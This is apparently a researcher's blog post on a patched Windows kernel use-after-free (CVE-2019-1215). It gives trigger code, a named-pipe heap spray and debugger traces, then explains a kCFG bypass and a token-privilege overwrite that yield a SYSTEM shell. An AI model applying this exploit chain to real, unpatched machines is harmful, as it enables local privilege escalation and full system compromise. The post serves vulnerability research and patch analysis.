Introduction
The following blog post discusses a recently patched use after free vulnerability (CVE-2019-1215) in ws2ifsl.sys, which can be used for local privilege escalation. The bug was present in Windows 7, Windows 8, Windows 10, Windows 2008, Windows 2012 and Windows 2019. It was patched on 10 September 2019. More information about it can be found here.
This post describes the root cause analysis and the exploitation on Windows 10 19H1 (1903) x64. The exploit shows how to bypass kASLR, kCFG and SMEP on this system.
Background about ws2ifsl
For better understanding of this analysis, we have to introduce some background information about the vulnerable driver. There is no public documentation about this driver, and most of the following information is reverse engineered. The ws2ifsl component is a driver which is related to winsocket.
The driver implements two objects:
- A process object
- A socket object
The driver implements several dispatch routines, which can be called by the user. When NtCreateFile
is called with the filename set to \\Device\\WS2IFSL\\
, the function DispatchCreate
is reached. The function branches based on the string in the _FILE_FULL_EA_INFORMATION.EaName
. If it is NifsPvd
, it will call CreateProcessFile
, if it is NifsSct
it will call CreateSocketFile
.
The function CreateSocketFile
and CreateProcessFile
both create internal objects, which we call 'procData' and 'socketData'. After creation, these objects are saved in the _FILE_OBJECT.FsContext
of the file object, which was created in the dispatch routine.
The file object is the one which can be accessed in usermode with the handle returned from NtCreateFile
. The handle can be used to perform calls to DeviceIoControl
or WriteFile
. This means, that the 'procData' and 'sockedData' objects are not directly reference counted with ObfReferenceObject
and ObfDereferenceObject
, but the underlying file object is.
The driver implements two Asynchronous Procedure Call (APC) objects, which are called 'request queue' and 'cancel queue'. An APC is a mechanism to asynchronous execute functions in another thread. Because multiple APCs can be forced to execute in another thread, the kernel implements a queue which stores all the APCs to be executed.
The 'procData' object contains these two APC objects, which are initialized by CreateProcessFile
in InitializeRequestQueue
and InitializeCancelQueue
. An APC object is initialized by KeInitializeApc
, and receives a target thread and a function as arguments. Additionally, the processor mode (kernel or usermode) is set, as well as a rundown routine. In case of ws2ifsl, the rundown routines are RequestRundownRoutine
and CancelRundownRoutine
and the processor mode is set to usermode. Those rundown routine are used for cleanup and are called by the kernel if the thread dies before the APC has a chance to execute inside the thread. This could happen because an APC is only scheduled to be executed inside a thread if it is set into the alertable state. A thread could be set into the alertable state if, for example SleepEx
is called with the second argument set to TRUE.
The driver also implements a read and a write dispatch routine in DispatchReadWrite
, which is only accessible for the socket object, and calls DoSocketReadWrite
. This function, among other things, is responsible for adding the APC elements into the APC queue by calling the function SignalRequest
which uses the nt!KeInsertQueueApc
API function.
Communication with the driver
In many cases, a driver creates a symbolic link and its name can be used as a file name for CreateFileA
, but this is not the case with ws2ifsl. It only calls nt!IoCreateDevice
with the DeviceName set to '\Device\WS2IFSL'. However, by calling the native API NtOpenFile
it is possible to reach the create dispatch function ws2ifsl!DispatchCreate
. The following code can be used to accomplish this:
HANDLE fileHandle = 0; UNICODE_STRING deviceName; RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL"); OBJECT_ATTRIBUTES object; InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL); IO_STATUS_BLOCK IoStatusBlock ; NtOpenFile(&fileHandle, GENERIC_READ, &object, &IoStatusBlock, 0, 0);
The function DispatchCreate
will check the extended attributes of the open call. This attribute can only be set with the NtCreateFile
system call.
For the process object, the extended attribute (ea) data buffer must contain a thread handle belonging to the current process and after that we have a handle to the device, which we can use to to do further operations.
Patch Analysis
Now that we have covered the background, we can switch to the patch analysis. The patch analysis starts by comparing the unpatched version of ws2ifsl 10.0.18362.1 versus the patched version 10.0.18362.356.
We can quickly see that only a couple of functions have been patched:
- CreateProcessFile
- DispatchClose
- SignalCancel
- SignalRequest
- RequestRundownRoutine
- CancelRundownRoutine
This can be seen in the following screenshot:
The patched version contains also a new function:
- DereferenceProcessContext
The most obvious change is that all changed functions contain a new call to the new function DereferenceProcessContext
. This function can be seen in the following screenshot:
The next thing to notice is that the 'procData' object was extended by a new member and now uses a reference count. For example in CreateProcessFile
, which is responsible for all initializations, this new member is set to one.
procData->tag = 'corP'; *(_QWORD *)&procData->processId = PsGetCurrentProcessId(); procData->field_100 = 0;
vs
procData->tag = 'corP'; *(_QWORD *)&procData->processId = PsGetCurrentProcessId(); procData->dword100 = 0; procData->referenceCounter = 1i64; // new
The function DereferenceProcessContext
is also checking the reference count and either calls nt!ExFreePoolWithTag
on it or just returns.
The function DispatchClose
, which is the close dispatch routine of the driver, is also patched. The new version changed the call from nt!ExFreePoolWithTag
to DereferenceProcessContext
. This means that sometimes (if the reference counter is not zero) the 'procData' is not freed, only decrementing its reference count by one.
The fix in SignalRequest
increments the referenceCounter before the call to nt!KeInsertQueueApc
.
The bug is that the DispatchClose
function can be used to free the 'procData' object, even if a request is already queued in an APC. The function DispatchClose
is called, whenever the last reference to the file handle is closed (by calling CloseHandle
). The patch fixes a use after free because the rundown routine, among others, could access the data which was already freed.
The fix makes sure, by using the new referenceCounter, that the buffer is only freed after the last reference of it is dropped. In case of the rundown routine (which holds a reference), at the end of the function, the reference is dropped with DereferenceProcessContext
And the reference count is increased before calling nt!KeInsertQueueApc
. In case of an error, that nt!KeInsertQueueApc
would fail, the reference is also dropped (avoiding a memory leak).
Triggering the bug
To trigger the bug, all that is needed is to create a 'procData' handle, a 'socketData' handle, write some data to the 'socketData' and close both handles. The thread termination calls the APC rundown routine, which will work on the freed data. The following code would trigger the bug:
<..> in CreateProcessHandle: g_hThread1 = CreateThread(0, 0, ThreadMain1, 0, 0, 0); eaData->a1 = (void*)g_hThread1; // thread must be in current process eaData->a2 = (void*)0x2222222; // fake APC Routine eaData->a3 = (void*)0x3333333; // fake cancel Rundown Routine eaData->a4 = (void*)0x4444444; eaData->a5 = (void*)0x5555555; NTSTATUS status = NtCreateFile(&fileHandle, MAXIMUM_ALLOWED, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA)); DWORD supSuc = SuspendThread(g_hThread1); <..> in main: HANDLE procHandle = CreateProcessHandle(); HANDLE sockHandle = CreateSocketHandle(procHandle); char* writeBuffer = (char*) malloc(0x100); IO_STATUS_BLOCK io; LARGE_INTEGER byteOffset; byteOffset.HighPart = 0; byteOffset.LowPart = 0; byteOffset.QuadPart = 0; byteOffset.u.LowPart = 0; byteOffset.u.HighPart = 0; ULONG key = 0; CloseHandle(procHandle); NTSTATUS ret = NtWriteFile(sockHandle, 0, 0, 0, &io, writeBuffer, 0x100, &byteOffset, &key);
We can verify this behavior, when having a breakpoint at the free in DispatchClose
and at the RequestRundownRoutine
:
Breakpoint 2 hit ws2ifsl!DispatchClose+0x7d: fffff806`1b8e71cd e8ceeef3fb call nt!ExFreePool (fffff806`178260a0) 1: kd> db rcx ffffae0d`ceafbc70 50 72 6f 63 00 00 00 00-8c 07 00 00 00 00 00 00 Proc............ 1: kd> g Breakpoint 0 hit ws2ifsl!RequestRundownRoutine: fffff806`1b8e12d0 48895c2408 mov qword ptr [rsp+8],rbx 0: kd> db rcx-30 ffffae0d`ceafbc70 50 72 6f 63 00 00 00 00-8c 07 00 00 00 00 00 00 Proc............
Because the 'procData' object is already freed, the rundown routine will work on freed data. In most cases, this will not crash because the data block is not reallocated.
Heap Spray
After we now know how to trigger the bug, we can switch to the exploitation. The first step to do this is by reclaiming the freed allocation.
At first we need to know the size and the pool on which the buffer is allocated.
Using the pool command on the to be freed buffer, we can see that it is allocated on the Nonpaged pool and has the size of 0x120 bytes.
1: kd> !pool ffff8b08905e9910 Pool page ffff8b08905e9910 region is Nonpaged pool <..> *ffff8b08905e9900 size: 120 previous size: 0 (Allocated) *Ws2P Process: ffff8b08a32e3080 Owning component : Unknown (update pooltag.txt)
It can be verified by looking at the allocation of the buffer in ws2ifsl!CreateProcessFile:
PAGE:00000001C00079ED mov edx, 108h ; size PAGE:00000001C00079F2 mov ecx, 200h ; PoolType PAGE:00000001C00079F7 mov r8d, 'P2sW' ; Tag PAGE:00000001C00079FD call cs:__imp_ExAllocatePoolWithQuotaTag
A reliable way to perform controlled allocations of arbitrary size on the Nonpaged pool is to use named pipes: This technique was described by Alex Ionescu here. The following code can be used to allocate many 0x120 bytes buffer with user controlled data:
int doHeapSpray() { for (size_t i = 0; i < 0x5000; i++) { HANDLE readPipe; HANDLE writePipe; DWORD resultLength; UCHAR payload[0x120 - 0x48]; RtlFillMemory(payload, 0x120 - 0x48, 0x24); BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payload)); res = WriteFile(writePipe, payload, sizeof(payload), &resultLength, NULL); } return 0; }
If we merge this heap spray into the code which triggers the bug, we get a bug check inside nt!KiInsertQueueApc
. The crash happens due to a security violation on a liked list operation.
.text:00000001400A58F6 mov rax, [rdx] .text:00000001400A58F9 cmp [rax+_LIST_ENTRY.Blink], rdx .text:00000001400A58FD jnz fail_fast <..> .text:00000001401DC2EA fail_fast: ; CODE XREF: KiInsertQueueApc+53↑j .text:00000001401DC2EA ; KiInsertQueueApc+95↑j ... .text:00000001401DC2EA mov ecx, 3 .text:00000001401DC2EF int 29h ; Win8: RtlFailFast(ecx)
The bugcheck happens right at the int 29 instruction. While inspecting the registers at the time of the crash, we can see that the RAX register points into our controlled user data.
rax=ffff8b08905e82d0 rbx=0000000000000000 rcx=0000000000000003 rdx=ffff8b08a39c3128 rsi=0000000000000000 rdi=0000000000000000 rip=fffff8057489a2ef rsp=ffffde8268bfd4c8 rbp=ffffde8268bfd599 r8=ffff8b08a39c3118 r9=fffff80574d87490 r10=fffff80574d87490 r11=0000000000000000 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 0: kd> dq ffff8b08905e82d0 ffff8b08`905e82d0 24242424`24242424 24242424`24242424 ffff8b08`905e82e0 24242424`24242424 24242424`24242424 ffff8b08`905e82f0 24242424`24242424 24242424`24242424 ffff8b08`905e8300 24242424`24242424 24242424`24242424 ffff8b08`905e8310 24242424`24242424 24242424`24242424 ffff8b08`905e8320 24242424`24242424 24242424`24242424 ffff8b08`905e8330 24242424`24242424 24242424`24242424 ffff8b08`905e8340 24242424`24242424 24242424`24242424
The call stack leading to the crash is the following:
0: kd> k # Child-SP RetAddr Call Site 00 ffffb780`3ac7e868 fffff804`334a90c2 nt!DbgBreakPointWithStatus 01 ffffb780`3ac7e870 fffff804`334a87b2 nt!KiBugCheckDebugBreak+0x12 02 ffffb780`3ac7e8d0 fffff804`333c0dc7 nt!KeBugCheck2+0x952 03 ffffb780`3ac7efd0 fffff804`333d2ae9 nt!KeBugCheckEx+0x107 04 ffffb780`3ac7f010 fffff804`333d2f10 nt!KiBugCheckDispatch+0x69 05 ffffb780`3ac7f150 fffff804`333d12a5 nt!KiFastFailDispatch+0xd0 06 ffffb780`3ac7f330 fffff804`333dd2ef nt!KiRaiseSecurityCheckFailure+0x325 07 ffffb780`3ac7f4c8 fffff804`332cb84f nt!KiInsertQueueApc+0x136a87 08 ffffb780`3ac7f4d0 fffff804`3323ec58 nt!KiSchedulerApc+0x22f 09 ffffb780`3ac7f600 fffff804`333c5002 nt!KiDeliverApc+0x2e8 0a ffffb780`3ac7f6c0 fffff804`33804258 nt!KiApcInterrupt+0x2f2 0b ffffb780`3ac7f850 fffff804`333c867a nt!PspUserThreadStartup+0x48 0c ffffb780`3ac7f940 fffff804`333c85e0 nt!KiStartUserThread+0x2a 0d ffffb780`3ac7fa80 00007ff8`ed3ace50 nt!KiStartUserThreadReturn 0e 0000009e`93bffda8 00000000`00000000 ntdll!RtlUserThreadStart
The bugcheck got triggered because the main thread ends. The reason why it happened is because our corrupted APC is still inside the queue and the unlink operation works on corrupted data. Because the forward and backward pointers are corrupted and not pointing into the valid linked list, the safe unlinking detects this corruption and bugchecks.
KeRundownApcQueues
The code, which uses the freed APC element needs to be changed, to turn this into something useful.
After the bug is triggered and the old 'procData' is overwritten, the thread for which the APC is queued needs to exit. If this is done, the kernel calls the function nt!KeRundownApcQueues
, which bugchecks inside nt!KiFlushQueueApc
, because it accesses the corrupted data.
However, this time we can control the content of the buffer and we can avoid the security exception, because the valid pointer of the linked list is checked with a value pointing inside 'kthread'. Assuming we are running at medium integrity level, it is possible to leak the address of 'kthread' using a call to NtQuerySystemInformation with SystemHandleInformation. If we craft the reclaimed 'procData' with the 'kthread' address, the bugcheck is avoided and the nt!KeRundownApcQueues
tries to execute our user controlled function pointer inside the 'procData' object.
Bypassing kCFG
After we have control over what function pointer we want to execute, we have a little obstacle to overcome. KASLR is not an issue for this exploit, because it is possible to leak the ntoskrnl base address. With medium integrity level it is possible to leak the base address of all loaded modules via NtQuerySystemInformation / SystemModuleInformation. As a consequence, we now at least know where we could transfer our execution to.
However, the APC function pointer call is guarded by Microsoft's CFI implementation called Kernel Control Flow Guard. If we try to call any random Return Oriented Programming (ROP) gadget, the kernel would bail out with a bugcheck.
Fortunately, function prologues are all valid branch targets, from the CFG perspective, so we know what we can call without being stopped. When the function pointer is called in nt!KeRundownApcQueues
, the first argument (rcx) points into the 'procData' buffer and the second argument (rdx) is zero.
Another possibility we could use is to call the APC function pointer, by calling the native function NtTestAlert
. When calling the APC function pointer using NtTestAlert, the first argument (rcx) points into the 'procData' buffer and the second argument (rdx) also points to it.
After a little while looking for small functions, performing interesting things based on the given constrains we found one candidate: nt!SeSetAccessStateGenericMapping
.
As can be seen in the following, nt!SeSetAccessStateGenericMapping
can be used to perform an arbitrary write of 16 bytes.
Unfortunately, the second half of the 16 bytes are not fully controlled, but the first 8 bytes are based on the data provided by the heap spray.
Token Overwrite
Once we have a powerful arbitrary write primitive there are many things we could do. There are a lot of techniques to turn an arbitrary write into a full kernel read write primitives on old Windows versions. On the more recent versions of Windows 10 many of those technique have been mitigated. A technique, which is still working, is the token overwrite technique. It was first published in Cesar Cerrudo's "Easy local Windows Kernel Exploitation" publication in 2012 and we already made use of it in the past. The idea is to corrupt the _SEP_TOKEN_PRIVILEGES
object located inside a _TOKEN
object. The easiest way to do this is to overwrite the Present
and Enabled
members of this structure with all bits enabled. This will grant us the SeDebugPrivilege
privilege, which will allow us to inject code into high privileged processes such as 'winlogon.exe'.
We need to trigger the bug two times to reliably overwrite the token structure with 16 bytes. However this didn't seem to cause any trouble.
Getting System Privileges
Once we have been injected into the system process, this is basically game over. We can now e.g run "cmd.exe" to proivde us with an interactive command shell. We also avoid any more issues with kCFG and SMEP, because we do not perform ROP or execute any ring 0 code in the wrong context.
Exploit
The final exploit targets Windows 10 19H1 x64 and can be found here https://github.com/bluefrostsecurity/CVE-2019-1215. When executing the exploit with medium integrity privileges, successful exploitation spawns a new cmd.exe with system privileges.